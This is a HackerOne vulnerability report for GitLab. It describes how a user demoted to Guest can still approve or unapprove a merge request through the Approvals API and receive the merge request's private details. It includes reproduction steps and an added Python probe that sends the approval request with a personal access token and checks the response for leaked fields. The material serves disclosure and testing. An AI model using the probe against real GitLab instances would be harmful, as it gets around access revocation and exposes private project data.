
Revoked User can approve a Merge Request created by him via approve/unapprove API which leads to Merge request info leak

HackerOne report #1198317 by muthu_prakash on 2021-05-15, assigned to GitLab Team:


Report

Summary

In GitLab, when a user is demoted to the Guest role, that user is no longer able to view or edit the merge requests in a project, even if the merge request was created by them. But the Guest user can still use the Approvals API to approve/unapprove the merge request even after being demoted to Guest. This API also leaks the merge request details, which the Guest user is not supposed to view.

Steps to reproduce
  • Created a new project with private access
  • Created a new file in the master branch (made some changes)
  • Invited a user with the Maintainer role.
  • From the Maintainer role account, created a new branch named test and made some changes.
  • After that, from the project admin account, I created a merge request with source branch test and target branch master.
  • Assigned that merge request to the Maintainer role user.
  • After creating the merge request, from the project admin account, demoted the Maintainer role user to the Guest role.
  • From the demoted user's account, I created a personal access token with all available scopes selected.
  • Using an API client, sent a POST request to the approvals endpoint
    Sample endpoint:
  • This API endpoint responds with a 201 status and the merge request details, which the Guest user is not supposed to approve or view.
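The probe below is an added example for the procedure above; it is not part of the report or of GitLab's code. It builds the Approvals API URL (`POST /api/v4/projects/:id/merge_requests/:iid/approve` or `/unapprove`, as documented by GitLab), sends it with a personal access token in the `PRIVATE-TOKEN` header, and classifies the result: a token belonging to a Guest on a private project should be rejected (401/403/404), so a 2xx is the bug, and any merge request content in the body is the leak. The list of sensitive fields and the sample response are assumptions constructed for the offline demo, not captured from a real instance.

```python
"""Added probe for the Approvals API behaviour described in the report.

Not the report's own tooling.  Endpoint paths follow the public GitLab API
docs; SENSITIVE_MR_FIELDS and SAMPLE_GUEST_RESPONSE are constructed assumptions.
"""
import json
import urllib.error
import urllib.request

# Merge request fields a Guest on a private project must not be able to read.
# Assumption: chosen from the documented shape of the approval response.
SENSITIVE_MR_FIELDS = ("title", "description", "source_branch",
                       "target_branch", "sha", "web_url")


def approvals_url(base_url, project_id, mr_iid, action="approve"):
    """Build POST /api/v4/projects/:id/merge_requests/:iid/approve|unapprove."""
    if action not in ("approve", "unapprove"):
        raise ValueError("action must be 'approve' or 'unapprove'")
    return (f"{base_url.rstrip('/')}/api/v4/projects/{project_id}"
            f"/merge_requests/{mr_iid}/{action}")


def send_approval(url, token, opener=urllib.request.urlopen):
    """POST with a personal access token; return (status, parsed JSON or None).

    HTTP errors (401/403/404) are returned instead of raised so the caller can
    classify them; `opener` is injectable so the function can be exercised offline."""
    req = urllib.request.Request(url, data=b"", method="POST",
                                 headers={"PRIVATE-TOKEN": token})
    try:
        with opener(req) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        raw = err.read()
        try:
            return err.code, json.loads(raw) if raw else None
        except ValueError:
            return err.code, None


def classify(status, body):
    """Decide whether the probe reproduced the reported behaviour.

    A Guest-level token should be rejected.  A 2xx means the approval was
    accepted; sensitive MR fields present in the body are the information leak."""
    approved = 200 <= status < 300
    leaked = [f for f in SENSITIVE_MR_FIELDS
              if isinstance(body, dict) and body.get(f) not in (None, "")]
    return {
        "status": status,
        "approval_accepted": approved,
        "leaked_fields": leaked,
        "vulnerable": approved or bool(leaked),
    }


# Constructed sample of what a 201 to the demoted user's token might carry.
SAMPLE_GUEST_RESPONSE = {
    "id": 1, "iid": 1, "project_id": 1,
    "title": "Add feature", "description": "Internal details of the change",
    "state": "opened", "source_branch": "test", "target_branch": "master",
    "approvals_required": 0, "approvals_left": 0, "approved_by": [],
}

if __name__ == "__main__":
    # Live use: status, body = send_approval(approvals_url(base, pid, iid), token)
    print(approvals_url("https://gitlab.example", 1, 1))
    print(classify(201, SAMPLE_GUEST_RESPONSE))           # the reported behaviour
    print(classify(403, {"message": "403 Forbidden"}))    # what a Guest should get
```

Run it once with the Maintainer token before the demotion (expected 201) and again with the same user's token after the demotion; the second run should classify as rejected, and a 201 with populated `leaked_fields` reproduces the report.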
Impact

Demoted users can approve the merge requests created by them and can view the confidential data of those merge requests once their role is revoked. This leads to sensitive information disclosure to unauthorised users.

What is the current bug behavior?

Demoted users can approve the merge requests created by them and can view the confidential data of those merge requests once their role is revoked.

What is the expected correct behavior?

Demoted users should be blocked from approving the merge requests created by them and from viewing the confidential data of those merge requests once their role is revoked.

Output of checks

This bug happens on GitLab.com

How To Reproduce

Please add reproducibility information to this section: